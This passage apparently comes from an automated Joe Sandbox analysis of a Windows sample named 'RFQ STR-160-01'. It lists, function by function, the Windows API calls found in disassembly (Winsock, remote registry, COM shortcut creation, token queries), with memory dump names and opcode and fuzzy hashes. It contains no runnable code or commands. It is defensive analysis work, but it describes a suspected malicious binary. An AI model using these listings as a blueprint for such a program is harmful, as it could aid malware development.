              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: MessageSend$CreateObjectStockWindow
              • String ID: Msctls_Progress32
              • API String ID: 1025951953-3636473452
              • Opcode ID: 793f07dcebd4fd1c7c70a0e0dd92eb28ea8c9bde52732fcc94aa56aad85a5a22
              • Instruction ID: 82018372e2c8078b90cf3b2bb10c6135a029b2ad2a0a1d4909b29a0b1cd275c9
              • Opcode Fuzzy Hash: 793f07dcebd4fd1c7c70a0e0dd92eb28ea8c9bde52732fcc94aa56aad85a5a22
              • Instruction Fuzzy Hash: 6411B6B114022A7EEF118F64DC85EE77F5EEF09798F014110FA18A6190CB729C61DBA4
              APIs
                • Part of subcall function 005CD7A3: _free.LIBCMT ref: 005CD7CC
              • _free.LIBCMT ref: 005CD82D
                • Part of subcall function 005C29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,005CD7D1,00000000,00000000,00000000,00000000,?,005CD7F8,00000000,00000007,00000000,?,005CDBF5,00000000), ref: 005C29DE
                • Part of subcall function 005C29C8: GetLastError.KERNEL32(00000000,?,005CD7D1,00000000,00000000,00000000,00000000,?,005CD7F8,00000000,00000007,00000000,?,005CDBF5,00000000,00000000), ref: 005C29F0
              • _free.LIBCMT ref: 005CD838
              • _free.LIBCMT ref: 005CD843
              • _free.LIBCMT ref: 005CD897
              • _free.LIBCMT ref: 005CD8A2
              • _free.LIBCMT ref: 005CD8AD
              • _free.LIBCMT ref: 005CD8B8
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
              • Instruction ID: 4559227e852571de5d378b20d686de9cd7515b32df9452a89f1d60aff7aadb10
              • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
              • Instruction Fuzzy Hash: 9C11E771540B05AED621BFF0CC4AFCB7FE8FF84700F405829B29DE6892DA79A5458660
              APIs
              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 005FDA74
              • LoadStringW.USER32(00000000), ref: 005FDA7B
              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 005FDA91
              • LoadStringW.USER32(00000000), ref: 005FDA98
              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 005FDADC
              Strings
              • %s (%d) : ==> %s: %s %s, xrefs: 005FDAB9
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: HandleLoadModuleString$Message
              • String ID: %s (%d) : ==> %s: %s %s
              • API String ID: 4072794657-3128320259
              • Opcode ID: 6db913738a3e127145164f2efce319709a7b271019d7dffef74615209d985286
              • Instruction ID: d7b9e9d09100ba744b5955d369183b783e603855b39fd00e6cb0aa015a084600
              • Opcode Fuzzy Hash: 6db913738a3e127145164f2efce319709a7b271019d7dffef74615209d985286
              • Instruction Fuzzy Hash: 440186F250020C7FE710ABA4DD89EFB376DEB08311F405492B746E2141E6749E858F74
              APIs
              • InterlockedExchange.KERNEL32(017FE2A8,017FE2A8), ref: 0060097B
              • EnterCriticalSection.KERNEL32(017FE288,00000000), ref: 0060098D
              • TerminateThread.KERNEL32(00000000,000001F6), ref: 0060099B
              • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 006009A9
              • CloseHandle.KERNEL32(00000000), ref: 006009B8
              • InterlockedExchange.KERNEL32(017FE2A8,000001F6), ref: 006009C8
              • LeaveCriticalSection.KERNEL32(017FE288), ref: 006009CF
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
              • String ID:
              • API String ID: 3495660284-0
              • Opcode ID: e1184cf600fde6127ca3f2885d1500d8652b91b9ef8261ecdbd8c4cefb8219a6
              • Instruction ID: a5b979d6b9742f947cb6afa2ac65c7a480640dfcb25864083532b17c2e45f0f0
              • Opcode Fuzzy Hash: e1184cf600fde6127ca3f2885d1500d8652b91b9ef8261ecdbd8c4cefb8219a6
              • Instruction Fuzzy Hash: 1BF01D31442D02EBE7655B94EE8DBDA7A26BF01712F503015F101548A0CB749566DF90
              APIs
              • __WSAFDIsSet.WSOCK32(00000000,?), ref: 00611DC0
              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00611DE1
              • WSAGetLastError.WSOCK32 ref: 00611DF2
              • htons.WSOCK32(?), ref: 00611EDB
              • inet_ntoa.WSOCK32(?), ref: 00611E8C
                • Part of subcall function 005F39E8: _strlen.LIBCMT ref: 005F39F2
                • Part of subcall function 00613224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0060EC0C), ref: 00613240
              • _strlen.LIBCMT ref: 00611F35
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
              • String ID:
              • API String ID: 3203458085-0
              • Opcode ID: 4661fa1de3e896cd7a53f4accb3e18c75289a3509aa1059d07e670cb67368ebf
              • Instruction ID: 291db161821c1cac8e5a1c6c1882192011e23e6d9e37b5b86b42243a0bae863a
              • Opcode Fuzzy Hash: 4661fa1de3e896cd7a53f4accb3e18c75289a3509aa1059d07e670cb67368ebf
              • Instruction Fuzzy Hash: 7EB1BF31204301AFD724DF24C885EAA7BE6BF86318F58854CF5565F2A2DB31ED86CB91
              APIs
              • GetClientRect.USER32(?,?), ref: 00595D30
              • GetWindowRect.USER32(?,?), ref: 00595D71
              • ScreenToClient.USER32(?,?), ref: 00595D99
              • GetClientRect.USER32(?,?), ref: 00595ED7
              • GetWindowRect.USER32(?,?), ref: 00595EF8
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Rect$Client$Window$Screen
              • String ID:
              • API String ID: 1296646539-0
              • Opcode ID: 9eafa4852c8f2a32294b43335d97c67d9db45ef06869d90ff1b0e9cefa95a7ef
              • Instruction ID: 27e6ee34c72ef7ebd5b7dfe469201ad39c873da8c116351ea7d7f734a4fe672b
              • Opcode Fuzzy Hash: 9eafa4852c8f2a32294b43335d97c67d9db45ef06869d90ff1b0e9cefa95a7ef
              • Instruction Fuzzy Hash: 5BB15B35A00A4ADBDF20CFA9C4407EEBBF5FF44310F14941AE8A9D7250E734AA51DB50
              APIs
              • __allrem.LIBCMT ref: 005C00BA
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005C00D6
              • __allrem.LIBCMT ref: 005C00ED
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005C010B
              • __allrem.LIBCMT ref: 005C0122
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005C0140
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
              • String ID:
              • API String ID: 1992179935-0
              • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
              • Instruction ID: 53ac885b77e640447a526f8ebda01f8bb84f81467d18f68a716d919263fbc0ad
              • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
              • Instruction Fuzzy Hash: D381C475A00B06AFE7249EA8CC46FAABBE9FF81724F24452EF551D62C1E770E9408750
              APIs
              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,005B82D9,005B82D9,?,?,?,005C644F,00000001,00000001,8BE85006), ref: 005C6258
              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,005C644F,00000001,00000001,8BE85006,?,?,?), ref: 005C62DE
              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 005C63D8
              • __freea.LIBCMT ref: 005C63E5
                • Part of subcall function 005C3820: RtlAllocateHeap.NTDLL(00000000,?,00661444,?,005AFDF5,?,?,0059A976,00000010,00661440,005913FC,?,005913C6,?,00591129), ref: 005C3852
              • __freea.LIBCMT ref: 005C63EE
              • __freea.LIBCMT ref: 005C6413
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ByteCharMultiWide__freea$AllocateHeap
              • String ID:
              • API String ID: 1414292761-0
              • Opcode ID: 5ec364c16197bcd2c2c9387d47df11b749625436630ca590a9a8457d86ba93d3
              • Instruction ID: 0eed0ba23fff481260b7527e5dd743aa6e6e94c5e8ec5abb4559dc3546aafeb9
              • Opcode Fuzzy Hash: 5ec364c16197bcd2c2c9387d47df11b749625436630ca590a9a8457d86ba93d3
              • Instruction Fuzzy Hash: E0518D72600256AFEB258FA4DC85FAF7EAAFB84B50F154A2DF805D7181DB34DE40C660
              APIs
                • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
                • Part of subcall function 0061C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0061B6AE,?,?), ref: 0061C9B5
                • Part of subcall function 0061C998: _wcslen.LIBCMT ref: 0061C9F1
                • Part of subcall function 0061C998: _wcslen.LIBCMT ref: 0061CA68
                • Part of subcall function 0061C998: _wcslen.LIBCMT ref: 0061CA9E
              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0061BCCA
              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0061BD25
              • RegCloseKey.ADVAPI32(00000000), ref: 0061BD6A
              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0061BD99
              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0061BDF3
              • RegCloseKey.ADVAPI32(?), ref: 0061BDFF
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
              • String ID:
              • API String ID: 1120388591-0
              • Opcode ID: ea1812c6c71ec5efcb63e79c51560bd244258fca94a2f50b258e5cb044cffd53
              • Instruction ID: e90a95a443832cde03b86c53635b11e060349699d1bbf83af0cb9cd2e0cef655
              • Opcode Fuzzy Hash: ea1812c6c71ec5efcb63e79c51560bd244258fca94a2f50b258e5cb044cffd53
              • Instruction Fuzzy Hash: 0481A230208241EFD714DF24C895EAABBE6FF84308F18995CF4558B2A2DB31ED45CB92
              APIs
              • VariantInit.OLEAUT32(00000035), ref: 005EF7B9
              • SysAllocString.OLEAUT32(00000001), ref: 005EF860
              • VariantCopy.OLEAUT32(005EFA64,00000000), ref: 005EF889
              • VariantClear.OLEAUT32(005EFA64), ref: 005EF8AD
              • VariantCopy.OLEAUT32(005EFA64,00000000), ref: 005EF8B1
              • VariantClear.OLEAUT32(?), ref: 005EF8BB
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Variant$ClearCopy$AllocInitString
              • String ID:
              • API String ID: 3859894641-0
              • Opcode ID: eec3421c96f30b34c5df34a0ffb9e32162f79d2d3602d25872eb9acdbf98cf53
              • Instruction ID: f2e4513af012988c72205502151bcd666c58c0c716a8e0d499f0736048a8b741
              • Opcode Fuzzy Hash: eec3421c96f30b34c5df34a0ffb9e32162f79d2d3602d25872eb9acdbf98cf53
              • Instruction Fuzzy Hash: 6F51DA31900751BADF286F66D89972D7BA9FF85310F205466E885DF192DF708C40C766
              APIs
                • Part of subcall function 00597620: _wcslen.LIBCMT ref: 00597625
                • Part of subcall function 00596B57: _wcslen.LIBCMT ref: 00596B6A
              • GetOpenFileNameW.COMDLG32(00000058), ref: 006094E5
              • _wcslen.LIBCMT ref: 00609506
              • _wcslen.LIBCMT ref: 0060952D
              • GetSaveFileNameW.COMDLG32(00000058), ref: 00609585
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: _wcslen$FileName$OpenSave
              • String ID: X
              • API String ID: 83654149-3081909835
              • Opcode ID: ec88d852cfabf56153b48c492ad250786771420a4dbd89a6a8eaa034cdb1676d
              • Instruction ID: 39f0582ad90e7a3e4c206c3be50781b8d4a6d2b03b08a0ba30eaeb2766de5ea6
              • Opcode Fuzzy Hash: ec88d852cfabf56153b48c492ad250786771420a4dbd89a6a8eaa034cdb1676d
              • Instruction Fuzzy Hash: 20E182715043018FDB18DF24C885AABBBE6BFC5314F14896DE8999B3A2DB31DD05CBA1
              APIs
                • Part of subcall function 005A9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 005A9BB2
              • BeginPaint.USER32(?,?,?), ref: 005A9241
              • GetWindowRect.USER32(?,?), ref: 005A92A5
              • ScreenToClient.USER32(?,?), ref: 005A92C2
              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 005A92D3
              • EndPaint.USER32(?,?,?,?,?), ref: 005A9321
              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 005E71EA
                • Part of subcall function 005A9339: BeginPath.GDI32(00000000), ref: 005A9357
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
              • String ID:
              • API String ID: 3050599898-0
              • Opcode ID: d24a48feaf0d4ac960e407ebe08eb5dec6c6b9ca9eaacfe9e193677e1ff60aa1
              • Instruction ID: 32f285b614262e6bb4ecded8e876705aaffbd35a41ed65e103a02217c14e4855
              • Opcode Fuzzy Hash: d24a48feaf0d4ac960e407ebe08eb5dec6c6b9ca9eaacfe9e193677e1ff60aa1
              • Instruction Fuzzy Hash: 6B41B030104311AFDB20DF25CC89FAA7FB9FF8A720F140629F9948B1A1C7719845DB62
              APIs
              • InterlockedExchange.KERNEL32(?,000001F5), ref: 0060080C
              • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00600847
              • EnterCriticalSection.KERNEL32(?), ref: 00600863
              • LeaveCriticalSection.KERNEL32(?), ref: 006008DC
              • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 006008F3
              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00600921
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
              • String ID:
              • API String ID: 3368777196-0
              • Opcode ID: 68798fc43e81f2048e73b0ade3fadb324d12d4bd283922946c185b62c3b7e0a5
              • Instruction ID: 4034a7391e9e0afeb7e6d1dbe4e7708b46869f1d7dbc59737ff0333ecc12bec4
              • Opcode Fuzzy Hash: 68798fc43e81f2048e73b0ade3fadb324d12d4bd283922946c185b62c3b7e0a5
              • Instruction Fuzzy Hash: A4414C71900206EFEF149F94DC85AAA7BB9FF44310F1480A5ED009A297DB30EE65DBA4
              APIs
              • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,005EF3AB,00000000,?,?,00000000,?,005E682C,00000004,00000000,00000000), ref: 0062824C
              • EnableWindow.USER32(00000000,00000000), ref: 00628272
              • ShowWindow.USER32(FFFFFFFF,00000000), ref: 006282D1
              • ShowWindow.USER32(00000000,00000004), ref: 006282E5
              • EnableWindow.USER32(00000000,00000001), ref: 0062830B
              • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0062832F
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Window$Show$Enable$MessageSend
              • String ID:
              • API String ID: 642888154-0
              • Opcode ID: 635bcd9824adf142e61ef1cf8fc2febf4921d2985c9e4a64e776eff957f5f5fa
              • Instruction ID: 76f93f7fc8413236dc723d8784c5dfb29a993f54db0f088100f8579cac3d04aa
              • Opcode Fuzzy Hash: 635bcd9824adf142e61ef1cf8fc2febf4921d2985c9e4a64e776eff957f5f5fa
              • Instruction Fuzzy Hash: 3A418334603A54EFDB21CF55EC99BE47BE2BB0A714F185269E5084F362CB71A941CF90
              APIs
              • IsWindowVisible.USER32(?), ref: 005F4C95
              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 005F4CB2
              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 005F4CEA
              • _wcslen.LIBCMT ref: 005F4D08
              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 005F4D10
              • _wcsstr.LIBVCRUNTIME ref: 005F4D1A
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
              • String ID:
              • API String ID: 72514467-0
              • Opcode ID: 5c1c808a1e367681ced89b215004bd85fbc9dbfe9599ead9d8f1cdfc6784766d
              • Instruction ID: 5997bd331c173562f578ca260dd03756e68e4f480667866bac567bac1ada3bf9
              • Opcode Fuzzy Hash: 5c1c808a1e367681ced89b215004bd85fbc9dbfe9599ead9d8f1cdfc6784766d
              • Instruction Fuzzy Hash: 3921F632204205BBEB255B79AC49E7F7FDDEF85760F108029F905CA192EA65DC019BA0
              APIs
                • Part of subcall function 00593AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00593A97,?,?,00592E7F,?,?,?,00000000), ref: 00593AC2
              • _wcslen.LIBCMT ref: 0060587B
              • CoInitialize.OLE32(00000000), ref: 00605995
              • CoCreateInstance.OLE32(0062FCF8,00000000,00000001,0062FB68,?), ref: 006059AE
              • CoUninitialize.OLE32 ref: 006059CC
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
              • String ID: .lnk
              • API String ID: 3172280962-24824748
              • Opcode ID: b0fd139eebacf74bdd8a9bf710f9d2f88ac7c048255d10fe80a3fb4e80d40eb4
              • Instruction ID: 74d19632f5a8d7126d112a9ae3ff2b4f7f1edf84dd81b9308f5ef761d798e5f9
              • Opcode Fuzzy Hash: b0fd139eebacf74bdd8a9bf710f9d2f88ac7c048255d10fe80a3fb4e80d40eb4
              • Instruction Fuzzy Hash: 88D141716086019FCB18DF24C49496BBBE6FF89710F158859F88A9B3A1DB31EC45CF92
              APIs
                • Part of subcall function 005F0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 005F0FCA
                • Part of subcall function 005F0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 005F0FD6
                • Part of subcall function 005F0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 005F0FE5
                • Part of subcall function 005F0FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 005F0FEC
